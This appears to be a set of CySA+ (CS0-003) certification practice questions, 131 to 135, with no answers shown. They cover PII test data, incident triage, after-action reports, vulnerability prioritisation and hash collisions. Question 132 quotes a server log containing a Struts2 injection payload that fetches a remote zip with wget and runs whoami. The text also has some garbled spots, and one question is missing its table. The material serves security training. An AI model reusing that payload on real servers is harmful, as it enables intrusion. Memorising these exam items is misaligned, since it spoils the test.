CS0-003 Exam Question 131

A security administrator needs to import Pll data records from the production environment to the test environment for testing purposes. Which of the following would best protect data confidentiality?
  • CS0-003 Exam Question 132

    An incident response team member is triaging a Linux server. The output is shown below:
    $ cat /etc/passwd
    root:x:0:0::/:/bin/zsh
    bin:x:1:1::/:/usr/bin/nologin
    daemon:x:2:2::/:/usr/bin/nologin
    mail:x:8:12::/var/spool/mail:/usr/bin/nologin
    http:x:33:33::/srv/http:/bin/bash
    nobody:x:65534:65534:Nobody:/:/usr/bin/nologin
    git:x:972:972:git daemon user:/:/usr/bin/git-shell
    $ cat /var/log/httpd
    at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208) at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316) at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) WARN
    [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget
    http://grohl.ve.da/tmp/brkgtr.zip;#whoami)
    at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.<init> (FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator (FileUploadBase.java:334) at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.
    java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest (JakartaMultipartRequest.java:423) Which of the following is the adversary most likely trying to do?
  • CS0-003 Exam Question 133

    A security analyst provides the management team with an after-action report for a security incident. Which of the following is the management team most likely to review in order to correct validated issues with the incident response processes?
  • CS0-003 Exam Question 134

    A company patches its servers using automation software. Remote SSH or RDP connections are allowed to the servers only from the service account used by the automation software. All servers are in an internal subnet without direct access to or from the internet. An analyst reviews the following vulnerability summary:

    Which of the following vulnerability IDs should the analyst address first?
  • CS0-003 Exam Question 135

    A security analyst is reviewing the findings of the latest vulnerability report for a company ' s web application. The web application accepts files for a Bash script to be processed if the files match a given hash.
    The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?